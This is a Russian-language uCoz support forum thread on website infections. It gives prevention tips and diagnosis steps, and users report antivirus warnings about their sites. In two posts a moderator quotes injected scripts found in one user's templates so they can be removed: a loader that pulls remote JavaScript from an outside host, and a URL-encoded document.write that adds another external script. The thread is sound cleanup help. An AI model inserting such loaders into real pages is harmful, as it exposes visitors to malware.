Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
bedlam
Сообщений: 12
Сообщение # 1441 |
00:40:23
03 Авг 2014
|
Сообщение # 1442 |
00:45:56
03 Авг 2014
простите,но я ничего не поняла( как отключить рекламный баннер,если я не могу попасть на свой сайт?
Сообщение от defaultNick1597
|
webanet
Сообщений: 24067
Сообщение # 1443 |
00:56:54
03 Авг 2014
|
Сообщение # 1444 |
01:26:35
03 Авг 2014
Цитата webanet ( ) defaultNick1597, в панель управления сайтом вы можете войти по этому адресу http://alabai-mycao.ucoz.ru/admin спасибо,вошла,напишите пожалуйста подробно,что мне нужно сделать дальше?
Сообщение от defaultNick1597
|
Dimas777_
Сообщений: 59
Сообщение # 1445 |
07:56:02
03 Авг 2014
Здравствуйте, мой сайт http://game-portals.3dn.ru/
AVAST ругается на мой сайт и блокирует его с таким диалогом:
Заблокирована инфекция URL: hxxp://game-portals.3dn.ru/|{gzip} Заражение: JS:ScriptIP-inf
[Trj]Обратился в саппорт аваста и они мне ответили:
Добрый день, Дмитрий. Почистите пожалуйста все что связано с hxxp://www.gerardosalorio.com/ на Вашем сайте.
Искал я все что связано с этим сайтом и не чего не нашел.
http://game-portals.3dn.ru - Уникальный игровой портал!
Сообщение отредактировал Dimas777_ - Воскресенье, 03 Авг 2014, 09:21:43
|
Erazer5712
Сообщений: 7
Сообщение # 1446 |
18:52:47
04 Авг 2014
Доброго времени суток всем, возникла некая проблема. Сайт индексируется, но с пометкой "может угрожать вашему компьютеру" Яндекс сказал что корень проблемы не правильно поставленное CMS, и что источник проблемы хранится в .htaccess файлах. Собственно в чем проблема? В самом шаблоне проблему на нашел. Помогите:) http://erazer.ucoz.com/
|
webanet
Сообщений: 24067
Сообщение # 1447 |
19:06:52
04 Авг 2014
Erazer5712, с помощью быстрой замены удалить следующие скрипты
Код <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://txt.889.adv-multithreading.info' + '/?947043=F14XEUUBDwwACAoHEF5SV1tVVg'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> Код <!-- JAVASCRIPT --><script type="text/javascript"> <!-- document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61 %73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%76%61%74%61%72%69%61%2D%76%6B%6F%6E%74%61%6B%74%65%2E%72%75%2F%6A%73%2F%73%6 9%74%65%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E')); //--> </script>
|
Erazer5712
Сообщений: 7
Сообщение # 1448 |
19:26:11
04 Авг 2014
|
webanet
Сообщений: 24067
Сообщение # 1449 |
19:27:43
04 Авг 2014
Erazer5712, в поле что заменить вставляете скрипт (по одному) поле на что заменить оставляете пустым и производите замену. выбрать многострочный режим
|
Erazer5712
Сообщений: 7
Сообщение # 1450 |
19:29:44
04 Авг 2014
|
webanet
Сообщений: 24067
Сообщение # 1451 |
19:34:32
04 Авг 2014
Erazer5712, пробуйте в поле что заменить вставить всю конструкцию
Код <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://txt.889.adv-multithreading.info' + '/?947043=F14XEUUBDwwACAoHEF5SV1tVVg'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> <!-- JAVASCRIPT --><script type="text/javascript"> <!-- document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61 %73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%76%61%74%61%72%69%61%2D%76%6B%6F%6E%74%61%6B%74%65%2E%72%75%2F%6A%73%2F%73%6 9%74%65%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E')); //--> </script> или руками все шаблоны очищайте
|
Erazer5712
Сообщений: 7
Сообщение # 1452 |
19:35:29
04 Авг 2014
Сделал в ручную, больше спасибо за оказанную помощь!
|
Сообщение # 1453 |
10:57:19
05 Авг 2014
Цитата defaultNick1597 ( ) спасибо,вошла,напишите пожалуйста подробно,что мне нужно сделать дальше? а мне так и не ответили
Сообщение от defaultNick1597
|
webanet
Сообщений: 24067
Сообщение # 1454 |
19:18:03
05 Авг 2014
|
Сообщение # 1455 |
15:01:13
06 Авг 2014
спасибо за ответ
Сообщение от defaultNick1597
|